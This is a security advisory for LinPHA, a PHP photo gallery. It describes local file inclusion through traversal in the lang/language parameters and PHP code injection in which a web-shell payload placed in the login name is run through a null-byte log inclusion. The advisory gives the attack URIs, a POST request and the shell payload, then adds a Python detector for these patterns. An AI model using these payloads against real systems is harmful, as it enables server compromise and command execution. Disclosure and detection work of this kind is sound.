LinPHA Multiple Local File Inclusion and PHP Code Injection Vulnerabilities
The following URI examples were provided for the file inclusion issues:

http://www.example.com/[host]/docs/index.php?lang=/../../../../../../../../../../test
http://www.example.com/[path]/install/install.php?language=/../../../../../../../test
http://www.example.com/[path]/install/sec_stage_install.php?whatlang=1&language=/../../../../../../../test
http://[target]/[path]/install/sec_stage_install.php?language=/../../../../../../../test

The following HTTP POST example was provided for the file inclusion issues:

POST [path]install/forth_stage_install.php HTTP/1.1
Host: [somehost]
Content-Type: application/x-www-form-urlencoded
Content-Length: [data_length]
User-Agent: GameBoy, Powered by Nintendo
Connection: Close

language=/../../../../../../../../test

The file inclusion issues may allow for other system files to be retrieved if the 'magic_quotes_gpc' PHP directive is set to off.

The following steps were provided to exploit the PHP code injection issues:

1. Login with username: <?php system($_GET[cmd]);?> and password: [whatever]

If the 'magic_quotes_gpc' is set to off, it is possible to launch operating system commands through the following request:

http://www.example.com/[path]/docs/index.php?cmd=ls%20-la&lang=/../../sql/tmp/linpha.log%00
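
The request patterns listed above can be flagged in web server logs or in a request filter in front of the application. The following Python check is an added example, not part of the original advisory or of LinPHA's code; the /gallery paths, login.php and the user/pass field names in its demo are constructed assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter names taken from the advisory's file inclusion examples.
LANG_PARAMS = {"lang", "language"}
TRAVERSAL = re.compile(r"\.\.[/\\]")
PHP_TAG = re.compile(r"<\?(?:php|=)", re.I)


def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def check_request(target, body=""):
    """Return sorted finding labels for a request target and form body."""
    findings = set()
    for source in (urlsplit(target).query, body):
        for name, raw in parse_qsl(source, keep_blank_values=True):
            value = decode(raw)
            if PHP_TAG.search(value):
                findings.add("php-tag")  # PHP code in any field, e.g. a login name
            if name.lower() in LANG_PARAMS:
                if TRAVERSAL.search(value):
                    findings.add("traversal")
                if "\x00" in value:
                    findings.add("null-byte")  # %00 truncation of the include path
    return sorted(findings)


if __name__ == "__main__":
    # Constructed samples: (request target, urlencoded POST body).
    samples = [
        ("/gallery/docs/index.php?lang=german", ""),
        ("/gallery/docs/index.php?lang=/../../../../test", ""),
        ("/gallery/docs/index.php?cmd=id&lang=/../../sql/tmp/linpha.log%00", ""),
        ("/gallery/install/forth_stage_install.php", "language=/../../../test"),
        ("/gallery/login.php", "user=%3C%3Fphp+echo+1%3B%3F%3E&pass=x"),
    ]
    for target, body in samples:
        print(check_request(target, body) or "clean", target)
```

POST bodies are not recorded in standard access logs, so the body and login-field checks only apply where the request body is available, such as in a reverse proxy or WAF hook.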